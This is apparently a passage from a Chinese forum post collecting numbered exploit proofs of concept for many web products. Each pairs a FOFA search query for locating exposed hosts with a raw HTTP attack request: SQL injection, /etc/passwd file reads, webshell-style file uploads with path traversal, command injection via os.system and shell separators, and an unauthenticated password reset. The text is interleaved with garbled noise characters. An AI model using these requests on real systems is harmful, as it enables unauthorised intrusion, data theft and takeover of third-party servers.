: Z$ H/ F- h W* l- V5 x LF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统+ V4 |3 Q" R( P! i U
FOFA:title=="DataCube3". r2 d6 i* w/ A. I9 v/ [
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
& O7 v7 [) Z9 p6 [Host: your-ip! x; ]+ ?; Y& x6 @* F! G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.02 Z8 o! b; Z; f- h* X4 I0 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
' R, U. r- ? k5 X, RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 F- G5 e0 A! \; _% y+ oAccept-Encoding: gzip, deflate2 m! O) u) L1 B& b& ~
Connection: close
( R0 f6 {9 ?, Q) v3 ? qContent-Type: application/x-www-form-urlencoded$ ]# y5 b) `$ E# W7 H
# \" |2 u4 J! ~req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
0 {: {" |2 e( v! d {
e5 }8 c! S2 H. ^7 y! ?# E# ?! {& J4 l; T* H$ Y0 _( o
187. Mura CMS processAsyncObject SQL注入3 \: d! r, Z6 A6 `
CVE-2024-32640
, \6 N7 l: [1 m4 ZFOFA:"Mura CMS"( g+ n: g# ?" y! R$ P3 v
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1) {) T* H1 p6 n6 S+ [0 o, K
Host: your-ip
: d: T! s% X' k) a+ [& ~( P+ WContent-Type: application/x-www-form-urlencoded0 W0 {' v; M2 y+ L9 T
; {5 @7 I5 u9 E$ M
0 t) _# _9 R( C( aobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1% B# O2 ]( ~) K5 Q. v
4 q) R& q4 C* t* J0 P: ~
- s- [8 W6 w# O* P$ m# d0 Q188. 叁体-佳会视频会议 attachment 任意文件读取
" Y2 ^$ [# m9 D3 [- a3 \0 Cversion <= 3.9.7! t W0 _. _0 k! K7 N0 P+ ]9 d& ]
FOFA:body="/system/get_rtc_user_defined_info?site_id"3 o f/ o; y+ R; z! H
GET /attachment?file=/etc/passwd HTTP/1.1
+ N+ A$ }. X* R. J$ `$ wHost: your-ip% {. \% e( g6 ]' D {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. H- Z6 z3 ^) v. z9 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% ^( { t6 C/ t; tAccept-Encoding: gzip, deflate9 Q- V& t- a% u# C2 v1 N6 j
Accept-Language: zh-CN,zh;q=0.9,en;q=0.86 [0 S* j6 X) |
Connection: close
6 h, x/ u, _! X3 h. ]9 d
3 a% u, f- Y, N# d9 ]" N* r
8 u& B# q0 I k" {- u189. 蓝网科技临床浏览系统 deleteStudy SQL注入
2 `8 ^3 h' i9 aFOFA:app="LANWON-临床浏览系统"8 U& W7 I) ^7 u3 l2 _5 i9 i
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
) ~$ c8 Z3 |8 X0 P0 E5 S4 P: w0 SHost: your-ip+ V0 z3 M8 K( H
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- j! u8 ~$ \% L) L% d m/ \; B3 G+ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 U5 J7 J' T# X9 ~& X. ?Accept-Encoding: gzip, deflate
3 {, L- T; q% u1 A% q) t1 ~Accept-Language: zh-CN,zh;q=0.9% P3 w, o0 M* ~8 f6 s
Connection: close
) K; ^! s& @ I. x1 ]7 _( F' F, F4 u( D7 H
. v. s! x; k9 q& m4 L# v- T& m
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
$ L7 J2 y5 k# [& Y6 T, t( c N/ xFOFA:title=="短视频矩阵营销系统"
% e5 {- a3 y0 C% X1 Q$ L5 n* ^POST /index.php/admin/Userinfo/poihuoqu HTTP/2
; Z% f! Z8 k, i0 H3 T0 v; L* p7 zHost: your-ip1 ?! n: t0 O3 Z+ l/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
! h: C, {; h9 _1 y+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.91 B: G6 L( S- w& K5 }) u
Content-Type: application/x-www-form-urlencoded
, |* v. m" X; E* CAccept-Encoding: gzip, deflate
. D+ v2 g% b4 V J7 `Accept-Language: zh-CN,zh;q=0.9& J6 p* S) W7 g# ?4 c+ t
: ?. ?' b# G7 j& B a) ^. [) d [poi=file:///etc/passwd
! o7 V: R. w1 X j" o, s8 |6 ?# ]! F. G- ?
! O% e( ?$ p9 h6 X) B2 a5 u
7 P2 \7 j4 k6 r# X0 X- V191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' z4 d7 n& F/ r6 G" c/ Q
FOFA:body="/CDGServer3/index.jsp"2 A$ f& ^% W U1 ]' ]& w
POST /CDGServer3/js/../NavigationAjax HTTP/1.1$ [: t2 y C' Z8 C4 @# {
Host: your-ip
" g9 h$ C4 \) Z. ?8 f+ T% {! iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. O) I# W. M# b& r3 `: I- VContent-Type: application/x-www-form-urlencoded, E, J5 n0 ]& A$ a4 n8 x6 b0 K; ^! b
% h1 t1 T5 H( p& u. ~& j5 j
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
5 q4 v R8 [# ]: e- \' k5 c' n1 J# M# t6 D, {
. |/ t s7 F1 @0 `! i# k( X192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
/ X# D# \) a1 A8 w: lFOFA:title="用户登录_富通天下外贸ERP"' [* s6 s) g3 o1 ]0 z# |% H
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
! g! L6 d# G: k' X4 Z4 c1 q. D2 r; Z2 hHost: your-ip5 `; W4 X1 `) W5 c2 L: b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 \0 d" y/ V$ I1 x, V JContent-Type: application/x-www-form-urlencoded
: E( a( G! K7 X; R! j4 g0 k; a. Q! ^9 q4 n
& G) M/ ]9 B1 ]/ y, J! ^<% @ webhandler language="C#" class="AverageHandler" %>
) L, N& z' y, P0 T/ _using System;1 s! J' w6 b. c3 z% K( {
using System.Web;: j) Z5 w/ @" [! F' B
public class AverageHandler : IHttpHandler
" Z( ^5 _8 o" H E2 h{% ]! Q, W3 }/ q& \* t' ~4 x
public bool IsReusable
" o, g9 B% a& O/ t/ x k{ get { return true; } }
y4 ~& i9 ]- q. @ r, apublic void ProcessRequest(HttpContext ctx)
7 ^' B) D2 I b& j{
i% W6 e M' {* qctx.Response.Write("test");
* [7 o- r9 a1 T- b. U& R: P}7 T: c# K( s( a$ m; }
}
/ E. I5 c$ w: w' v6 x9 f# d/ `( S6 Z8 G3 N7 m) D$ n+ x4 C
2 N+ `1 g$ U5 q193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
9 B3 e6 L. T3 G* m9 d5 i: BFOFA:body="山石云鉴主机安全管理系统"
; I7 C2 s' E. g, d( qGET /master/ajaxActions/getTokenAction.php HTTP/1.1
4 `1 Q$ h# v% _2 QHost:+ K: }1 Q# A7 t* {
Cookie: PHPSESSID=2333333333333;+ y/ [2 a8 v* h8 |; r
Content-Type: application/x-www-form-urlencoded5 ]: p5 i, C4 ^/ J: z
User-Agent: Mozilla/5.0
( h. w4 P$ B% \' u7 r' o: i
$ q, G& V5 a! E# r: A" H
$ F1 b5 X5 [6 H1 tPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
, H4 b' p; u# D( ^4 ~% ~/ _ fHost:
! m1 \4 ^: f; q c$ b* `+ T8 Q' _, ]5 DUser-Agent: Mozilla/5.0
6 V0 d& b1 k) ]/ {4 oAccept-Encoding: gzip, deflate. T0 U `1 z) x
Accept: */*
! c! Q7 k( U) f+ L* l) eConnection: close3 ~: n1 q8 ~" R: f
Cookie: PHPSESSID=2333333333333;
7 s' L! h+ U9 y4 u) `Content-Type: application/x-www-form-urlencoded B! V5 Y' S8 B
Content-Length: 84
3 l0 O( c; Q% g, G8 ^$ O' M, W2 R$ n; B$ N {1 Q
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'). [7 t0 U, Z8 L* f, A u1 E* T
3 y9 G/ j* K" ^7 H6 c
" E/ _! f0 \0 O) o4 @
GET /master/img/config HTTP/1.17 ?; Z, X" P) ^' W5 a: d
Host:
2 u5 P$ x/ }' l( tUser-Agent: Mozilla/5.0* d/ C0 O) i2 Z. T f
7 q0 z8 O2 d! S) W# I
: y0 ]) ?/ h' {1 ]4 O194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传. y1 N9 Q/ k! h4 o( X; e) O
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在6 n( b# O& r$ k* X
% d# a, |5 y1 }- v
POST /servlet/uploadAttachmentServlet HTTP/1.1" Z l* b9 |5 c
Host: host* q- C5 N7 k; p0 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36. Z1 W2 x3 P, `( C8 \, O+ y, R- f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 k2 G, Z9 o6 M/ _& u: j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ C/ I( T, y$ \% ~9 @: cAccept-Encoding: gzip, deflate
' d2 V i: u9 z5 uConnection: close/ Q2 b. f8 {: [8 B+ i2 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk' c5 I+ g. y8 _
------WebKitFormBoundaryKNt0t4vBe8cX9rZk+ S& L- H1 h- _
v! S; y' u8 f6 B
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"7 a( Q& k2 \) X( g
Content-Type: text/plain
. t }* S! u; S4 ?9 i<% out.println("hello");%>. W1 E. q# S$ q. a" ^4 w$ i$ Q
------WebKitFormBoundaryKNt0t4vBe8cX9rZk! i4 w. i; [% O8 ^
Content-Disposition: form-data; name="json"
4 t' A$ j5 w6 b- h6 b/ B7 c( { {"iq":{"query":{"UpdateType":"mail"}}}
2 @ c) E- H8 U* {; i8 J6 F------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
$ c1 n' u9 O2 `1 O
) c7 p, w) h2 {/ c- j: e, h8 d! r9 U, m1 H4 @( \* r) N
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, Z" Z; ~+ C+ ~! {FOFA:title=="飞鱼星企业级智能上网行为管理系统/ E- n( T2 D( d. P, ]
POST /send_order.cgi?parameter=operation HTTP/1.1
* ~( U W# G- Y; l, N3 {Host: 127.0.0.1# p- U0 E( U: Q+ ~: l: v, I
Pragma: no-cache) ]8 [3 q7 V, Q: d! o
Cache-Control: no-cache
; K2 n+ J: i. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' G% l- j( |7 j! q$ ~+ Q6 TAccept: */*
8 C$ I' Z% y0 Y) M2 R$ nAccept-Encoding: gzip, deflate0 D* P( x- q2 f6 G
Accept-Language: zh-CN,zh;q=0.9
2 X' e% ]4 t) f6 qConnection: close
2 t3 q; L5 m+ O2 {1 @Content-Type: application/x-www-form-urlencoded: g G1 d# ]/ P9 b) t/ U ]
Content-Length: 68
! \8 x$ G, Z! i, E- V" o$ l8 D! c" P7 l0 u
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}4 C, M3 Q" I7 F1 ]
" U& [( D& a2 Q* {8 Y+ r# S! E' F2 k( [+ [6 w2 z
196. 河南省风速科技统一认证平台密码重置
' @, C7 `8 F* E3 C1 AFOFA:body="/cas/themes/zbvc/js/jquery.min.js"' `8 E/ _4 X+ t, L' T
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
7 r5 ?2 s5 M% ~2 Q; Z. `3 y4 H; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. d, P' w. A, ^3 HContent-Type: application/json;charset=UTF-8
0 B8 f. g0 P% `$ i" R1 {( v. k. l* UX-Requested-With: XMLHttpRequest$ J, q1 ?, S; |8 x9 k/ v/ h
Host:
- Z' a+ s! S8 J' {* CAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
. F$ \3 s, Y0 \4 pContent-Length: 45* _' F ]$ e# ^ t. f/ ]; D0 q" o
Connection: close
" ^( w1 d; T, s. G+ [ E8 F) B
# ?2 o/ z- N. i4 a2 |* Q{"xgh":"test","newPass":"test666","email":""}
" G3 @. E! k; e0 h4 R
% I* P# D7 Q- w/ Z0 k/ N( I- l( T+ f+ P7 H6 k& T$ m9 v
# G0 B) O( h( k/ T6 U197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
- ^& G2 X7 {, P' y( sFOFA:app="浙大恩特客户资源管理系统"
L2 d/ V* T( M% jGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" Y( x* B8 q# a5 `0 n. K
Host: J* m: n6 G3 d) r8 U, `1 @6 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
) I/ F5 M3 T6 S8 ]7 A* K( kAccept-Encoding: gzip, deflate' h1 W4 H4 t. e s$ K
Connection: close
* f! C: d5 Q6 P' ~3 e% h) }
, g# p3 c2 i: K
' h' G. h6 V. ^' w/ p
6 O# d' Y) [5 l. ]198. 阿里云盘 WebDAV 命令注入7 ~ j) n- l, F g3 o, G
CVE-2024-29640
9 m$ g7 S4 q' V0 ]) V7 O5 z% pGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. _) Q+ T. P/ w) _Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64! T# P# x. ^" k1 Y
Accept: */*! o8 Q' R; g3 n" L
Accept-Encoding: gzip, deflate6 x! f& E. {2 x# r/ J: U
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.64 N( D4 i. j4 y2 x8 i9 `/ V
Connection: close
5 K! W4 u6 P9 [* x
/ E! T+ X# N& G/ w: S2 U2 G! v6 k( Y$ Y9 a' o: z2 ^
199. cockpit系统assetsmanager_upload接口 文件上传
* m, E& [3 D% y/ T) U! [0 w2 v) R5 m6 T
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
. m% B' O" |8 s7 \8 OGET /auth/login?to=/ HTTP/1.1' Q; T# w- k# c- L/ D
4 v' V% r' v& M: T: V( t
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"9 i# C7 w. _6 \4 n
* U; R: N9 V9 C( j b2.使用刚才上一步获取到的jwt获取cookie:
$ F- E$ P2 V; ~$ {5 h/ ?; X
: {: K% g: c' B7 RPOST /auth/check HTTP/1.1" V; F. G/ Q7 k+ D I- @. H- T
Content-Type: application/json5 N" j) ? j& S4 |, |# p. z$ ?, c7 J; |
9 M3 K- l! n5 w
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"} ~) {/ G9 [+ X& k; ^3 n, a0 R
. x1 E2 H& z9 i9 E# | O; d响应:200,返回值:7 y2 T* U& n, u) r
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
7 Y. @! W8 b; | D5 q7 x4 R9 gFofa:title="Authenticate Please!"" o: v% f1 y$ D$ x
POST /assetsmanager/upload HTTP/1.18 _8 f# t6 ]. H: n( u, ~
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb30 y; M+ `* `; R( r: y- t9 n, d
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92% X2 f# H5 h5 W$ \, [# x; B, u$ n
/ z. \! j& S. g+ n- J. P& j4 |: V
-----------------------------36D28FBc36bd6feE7Fb39 G/ U0 M2 U' A6 k
Content-Disposition: form-data; name="files[]"; filename="tttt.php": o) X8 P" M$ q5 I( L. |& M! z
Content-Type: text/php( Q. |. l( A g+ ?* `
4 a! V0 a8 Y6 A4 B<?php echo "tttt";unlink(__FILE__);?>' _1 k9 k3 g/ j! L% e
-----------------------------36D28FBc36bd6feE7Fb3
2 `1 p: i$ @. S$ d9 DContent-Disposition: form-data; name="folder"
" I4 C) M/ S9 e% m0 a8 q0 _' J* x4 ~/ {1 l
-----------------------------36D28FBc36bd6feE7Fb3--- F5 S1 f# J- H0 P4 A* @
6 ?' C K# y! r, @2 l
7 t7 N& j- r% C
/storage/uploads/tttt.php5 L$ s; E/ X! d' Y
$ G% p1 i& H' B+ P* [200. SeaCMS海洋影视管理系统dmku SQL注入; }6 s+ J8 u* h, C% H" k" ~
FOFA:app="海洋CMS"
9 t$ d4 r6 M# Z0 VGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1& b m6 U! T5 s7 @: M: A1 Y: _
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
7 X9 n( L: ~8 S$ U( [& vUpgrade-Insecure-Requests: 1
; m8 q: ^9 y! i& O6 O) cCache-Control: max-age=0
* G# b; e. e |" c3 Y8 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 G, K% h0 D6 ~" N% I. ]Accept-Encoding: gzip, deflate) x/ z& e8 C* p% V8 c
Accept-Language: zh-CN,zh;q=0.9! t% I; e# B; p+ t1 r* u M
* p; @1 t0 ?& \" T
$ a+ N3 } L7 ^# h7 w; K201. 方正全媒体新闻采编系统 binary SQL注入
' M$ \5 L& V3 A, G | {FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"& f1 y3 d- F. o
POST /newsedit/newsplan/task/binary.do HTTP/1.1" m5 S' u, X1 l2 @: N3 s: I/ V0 @+ f
Content-Type: application/x-www-form-urlencoded0 F( j9 G9 @8 G( j) F' n+ p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 I, f* Y! s9 o q
Accept-Encoding: gzip, deflate
& g$ G' U2 W; @& h! a( J: gAccept-Language: zh-CN,zh;q=0.9
$ C% w0 x( Q4 ~: {: ^. vConnection: close+ e/ H6 ]; O* f$ w1 J( L- B6 \
2 E1 t1 U# t% P3 J" P. h8 M+ k
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
9 I9 v! _: K3 }# ^, s; X7 q+ p, }7 G( \
+ ^: H" P c4 _
202. 微擎系统 AccountEdit任意文件上传
+ G8 ?1 G7 h) E- _4 gFOFA:body="/Widgets/WidgetCollection/"
7 R. n+ f0 U/ _# {) A获取__VIEWSTATE和__EVENTVALIDATION值
1 X4 t1 w7 P% o/ t1 KGET /User/AccountEdit.aspx HTTP/1.1" G" A$ v* s' t/ x: L& [) _
Host: 滑板人之家5 q/ w" X' e8 x$ |; H4 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.317 b4 j. s: X0 x, a i8 A) _, y
Content-Length: 0
8 D- I3 o2 \' H# K3 A) ^/ F, k6 ?% [9 X2 S) i* R' Y
& ?7 D3 _3 e8 I( u9 d
替换__VIEWSTATE和__EVENTVALIDATION值. R5 G* H8 b% ?
POST /User/AccountEdit.aspx HTTP/1.1
. v9 n& y* q) D+ b1 C# w% ~- L+ XAccept-Encoding: gzip, deflate, br
4 J& p8 O0 S$ i k( V4 [% QContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687) ]& i6 F, k3 S8 X
0 K* P/ n% Q, B1 l6 c-----------------------------786435874t38587593865736587346567358735687
4 I, V! Z- D+ \$ w3 f& ~0 q: `( VContent-Disposition: form-data; name="__VIEWSTATE"2 ?* f; J8 t: A- h
7 L( i& `' @3 `4 J9 A8 \__VIEWSTATE5 U/ p( d4 `& a3 o
-----------------------------786435874t385875938657365873465673587356874 R# X- l& }4 r( T( g8 K
Content-Disposition: form-data; name="__EVENTVALIDATION"# I$ v8 o6 q' I7 W! f/ D8 |, ~
, e8 W0 O4 F6 J: d. ] A__EVENTVALIDATION
. Z. S) g2 y: _-----------------------------786435874t385875938657365873465673587356878 I2 M) w( m i( ~0 M
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"* e2 j2 `+ q! K, K8 b3 }; n; U
Content-Type: text/plain# U |' N4 |9 z: J
J- c/ G. `4 I1 d6 h4 LHello World!
* x' r/ f& S4 @; T8 w2 M" [-----------------------------786435874t38587593865736587346567358735687
3 X' i. o- @ r1 M7 EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
& I3 x. n1 }- O1 y4 Q' O3 k" W: P2 y
上传图片3 g' S- ^. R& J; |
-----------------------------786435874t38587593865736587346567358735687- I5 h* L$ ^; H' M9 O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"1 j3 V6 y6 R Q" _5 s6 E' r2 S9 |
( {- i7 V9 }8 W Y: _/ [
8 O; m) {3 F3 G' w/ v-----------------------------786435874t38587593865736587346567358735687. L( f. v; a" X( {8 i- C: p" A
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"9 d6 q; k7 h5 o
9 w' k, k; L. R, K, v" }& x3 Q
/ j" ?+ R# e7 M8 s" |1 t-----------------------------786435874t38587593865736587346567358735687--
5 s! G" O2 `$ K0 F
6 |0 V, [4 {; w/ O1 j0 _
5 m' u1 b) O9 y, R" D/_data/Uploads/1123.txt
/ T; `( @+ y" U2 \* x9 ^; s3 l" z9 ~2 s0 t$ B& T
203. 红海云EHR PtFjk 文件上传
9 T7 t' R/ a% c* h' U' WFOFA:body="RedseaPlatform"
2 G( c4 u: ^* D- V0 uPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
: k, I3 [" Y, K9 H9 _6 a. L3 JHost: x.x.x.x
2 H- g0 |1 k2 P* J8 w1 Z: S3 [Accept-Encoding: gzip2 ]# }& Q+ e8 ?9 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" g8 d9 ~, x8 I/ j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
7 G" d% V8 W- y! ~Content-Length: 210
, B- a B( ^. t" y% A$ ?# }; @' ~1 ^
7 U3 z/ }' Q' ^4 j6 E, i& n% K------WebKitFormBoundaryt7WbDl1tXogoZys46 [2 L, j+ m- K. Q: ^
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
8 @" @* l% j3 } P- ]; L. AContent-Type:image/jpeg# G/ K. d/ L1 a' l3 T& T
& j3 ^3 j* z5 [" K" d$ E
<% out.print("hello,eHR");%>3 _) H9 ?' W; u, a- Y
------WebKitFormBoundaryt7WbDl1tXogoZys4--
* U* F3 }: o1 Z2 a% T1 A7 I6 h ]2 T! h$ S0 j5 \4 ~7 E
- X9 ?) @6 L+ L! X$ l
0 Y: @& S, U; B! I7 V0 h
( W# P2 }8 @2 x1 I
, `$ ^6 J# z4 N L% ~3 E% G1 J$ c7 ^
|
发表于 2024-6-5 14:31:29
收藏
支持
反对